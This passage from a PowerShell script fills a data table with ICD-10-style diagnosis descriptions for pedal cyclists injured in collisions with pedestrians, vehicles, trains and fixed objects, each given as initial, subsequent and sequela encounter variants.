nontraffic accident","Unspecified pedal cyclist injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with pedestrian or animal in nontraffic accident","Unspecified pedal cyclist injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with pedestrian or animal","Person boarding or alighting a pedal cycle injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with pedestrian or animal","Person boarding or alighting a pedal cycle injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with pedestrian or animal","Person boarding or alighting a pedal cycle injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with pedestrian or animal in traffic accident","Pedal cycle driver injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with pedestrian or animal in traffic accident","Pedal cycle driver injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with pedestrian or animal in traffic accident","Pedal cycle driver injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with pedestrian or animal in traffic accident","Pedal cycle passenger injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with pedestrian or animal in traffic accident","Pedal cycle passenger injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with pedestrian or animal in traffic accident","Pedal cycle passenger injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with pedestrian or animal in traffic accident","Unspecified pedal cyclist injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with pedestrian or animal in traffic accident","Unspecified pedal cyclist injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with pedestrian or animal in traffic accident","Unspecified pedal cyclist injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other pedal cycle in nontraffic accident","Pedal cycle driver injured in collision with other pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other pedal cycle in nontraffic accident","Pedal cycle driver injured in collision with other pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other pedal cycle in nontraffic accident","Pedal cycle driver injured in collision with other pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other pedal cycle in nontraffic accident","Pedal cycle passenger injured in collision with other pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other pedal cycle in nontraffic accident","Pedal cycle passenger injured in collision with other pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other pedal cycle in nontraffic accident","Pedal cycle passenger injured in collision with other pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other pedal cycle in nontraffic accident","Unspecified pedal cyclist injured in collision with other pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other pedal cycle in nontraffic accident","Unspecified pedal cyclist injured in collision with other pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other pedal cycle in nontraffic accident","Unspecified pedal cyclist injured in collision with other pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with other pedal cycle","Person boarding or alighting a pedal cycle injured in collision with other pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with other pedal cycle","Person boarding or alighting a pedal cycle injured in collision with other pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with other pedal cycle","Person boarding or alighting a pedal cycle injured in collision with other pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other pedal cycle in traffic accident","Pedal cycle driver injured in collision with other pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other pedal cycle in traffic accident","Pedal cycle driver injured in collision with other pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other pedal cycle in traffic accident","Pedal cycle driver injured in collision with other pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other pedal cycle in traffic accident","Pedal cycle passenger injured in collision with other pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other pedal cycle in traffic accident","Pedal cycle passenger injured in collision with other pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other pedal cycle in traffic accident","Pedal cycle passenger injured in collision with other pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other pedal cycle in traffic accident","Unspecified pedal cyclist injured in collision with other pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other pedal cycle in traffic accident","Unspecified pedal cyclist injured in collision with other pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other pedal cycle in traffic accident","Unspecified pedal cyclist injured in collision with other pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a pedal cycle injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a pedal cycle injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a pedal cycle injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedal cycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedal cycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified pedal cyclist injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with car, pick-up truck or van in nontraffic accident","Pedal cycle driver injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with car, pick-up truck or van in nontraffic accident","Pedal cycle driver injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with car, pick-up truck or van in nontraffic accident","Pedal cycle driver injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with car, pick-up truck or van in nontraffic accident","Pedal cycle passenger injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with car, pick-up truck or van in nontraffic accident","Pedal cycle passenger injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with car, pick-up truck or van in nontraffic accident","Pedal cycle passenger injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified pedal cyclist injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified pedal cyclist injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified pedal cyclist injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with car, pick-up truck or van","Person boarding or alighting a pedal cycle injured in collision with car, pick-up truck or van, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with car, pick-up truck or van","Person boarding or alighting a pedal cycle injured in collision with car, pick-up truck or van, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with car, pick-up truck or van","Person boarding or alighting a pedal cycle injured in collision with car, pick-up truck or van, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with car, pick-up truck or van in traffic accident","Pedal cycle driver injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with car, pick-up truck or van in traffic accident","Pedal cycle driver injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with car, pick-up truck or van in traffic accident","Pedal cycle driver injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with car, pick-up truck or van in traffic accident","Pedal cycle passenger injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with car, pick-up truck or van in traffic accident","Pedal cycle passenger injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with car, pick-up truck or van in traffic accident","Pedal cycle passenger injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with car, pick-up truck or van in traffic accident","Unspecified pedal cyclist injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with car, pick-up truck or van in traffic accident","Unspecified pedal cyclist injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with car, pick-up truck or van in traffic accident","Unspecified pedal cyclist injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedal cycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedal cycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedal cycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedal cycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedal cycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedal cycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a pedal cycle injured in collision with heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a pedal cycle injured in collision with heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a pedal cycle injured in collision with heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with heavy transport vehicle or bus in traffic accident","Pedal cycle driver injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with heavy transport vehicle or bus in traffic accident","Pedal cycle driver injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with heavy transport vehicle or bus in traffic accident","Pedal cycle driver injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with heavy transport vehicle or bus in traffic accident","Pedal cycle passenger injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with heavy transport vehicle or bus in traffic accident","Pedal cycle passenger injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with heavy transport vehicle or bus in traffic accident","Pedal cycle passenger injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified pedal cyclist injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with railway train or railway vehicle in nontraffic accident","Pedal cycle driver injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with railway train or railway vehicle in nontraffic accident","Pedal cycle driver injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with railway train or railway vehicle in nontraffic accident","Pedal cycle driver injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with railway train or railway vehicle in nontraffic accident","Pedal cycle passenger injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with railway train or railway vehicle in nontraffic accident","Pedal cycle passenger injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with railway train or railway vehicle in nontraffic accident","Pedal cycle passenger injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with railway train or railway vehicle","Person boarding or alighting a pedal cycle injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with railway train or railway vehicle","Person boarding or alighting a pedal cycle injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with railway train or railway vehicle","Person boarding or alighting a pedal cycle injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with railway train or railway vehicle in traffic accident","Pedal cycle driver injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with railway train or railway vehicle in traffic accident","Pedal cycle driver injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with railway train or railway vehicle in traffic accident","Pedal cycle driver injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with railway train or railway vehicle in traffic accident","Pedal cycle passenger injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with railway train or railway vehicle in traffic accident","Pedal cycle passenger injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with railway train or railway vehicle in traffic accident","Pedal cycle passenger injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with railway train or railway vehicle in traffic accident","Unspecified pedal cyclist injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with railway train or railway vehicle in traffic accident","Unspecified pedal cyclist injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with railway train or railway vehicle in traffic accident","Unspecified pedal cyclist injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other nonmotor vehicle in nontraffic accident","Pedal cycle driver injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other nonmotor vehicle in nontraffic accident","Pedal cycle driver injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other nonmotor vehicle in nontraffic accident","Pedal cycle driver injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other nonmotor vehicle in nontraffic accident","Pedal cycle passenger injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other nonmotor vehicle in nontraffic accident","Pedal cycle passenger injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other nonmotor vehicle in nontraffic accident","Pedal cycle passenger injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified pedal cyclist injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with other nonmotor vehicle in nontraffic accident","Person boarding or alighting a pedal cycle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with other nonmotor vehicle in nontraffic accident","Person boarding or alighting a pedal cycle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with other nonmotor vehicle in nontraffic accident","Person boarding or alighting a pedal cycle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other nonmotor vehicle in traffic accident","Pedal cycle driver injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other nonmotor vehicle in traffic accident","Pedal cycle driver injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other nonmotor vehicle in traffic accident","Pedal cycle driver injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other nonmotor vehicle in traffic accident","Pedal cycle passenger injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other nonmotor vehicle in traffic accident","Pedal cycle passenger injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other nonmotor vehicle in traffic accident","Pedal cycle passenger injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other nonmotor vehicle in traffic accident","Unspecified pedal cyclist injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other nonmotor vehicle in traffic accident","Unspecified pedal cyclist injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other nonmotor vehicle in traffic accident","Unspecified pedal cyclist injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with fixed or stationary object in nontraffic accident","Pedal cycle driver injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with fixed or stationary object in nontraffic accident","Pedal cycle driver injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with fixed or stationary object in nontraffic accident","Pedal cycle driver injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with fixed or stationary object in nontraffic accident","Pedal cycle passenger injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with fixed or stationary object in nontraffic accident","Pedal cycle passenger injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with fixed or stationary object in nontraffic accident","Pedal cycle passenger injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with fixed or stationary object in nontraffic accident","Unspecified pedal cyclist injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with fixed or stationary object in nontraffic accident","Unspecified pedal cyclist injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with fixed or stationary object in nontraffic accident","Unspecified pedal cyclist injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with fixed or stationary object","Person boarding or alighting a pedal cycle injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with fixed or stationary object","Person boarding or alighting a pedal cycle injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in collision with fixed or stationary object","Person boarding or alighting a pedal cycle injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with fixed or stationary object in traffic accident","Pedal cycle driver injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with fixed or stationary object in traffic accident","Pedal cycle driver injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with fixed or stationary object in traffic accident","Pedal cycle driver injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with fixed or stationary object in traffic accident","Pedal cycle passenger injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with fixed or stationary object in traffic accident","Pedal cycle passenger injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with fixed or stationary object in traffic accident","Pedal cycle passenger injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with fixed or stationary object in traffic accident","Unspecified pedal cyclist injured in collision with fixed or 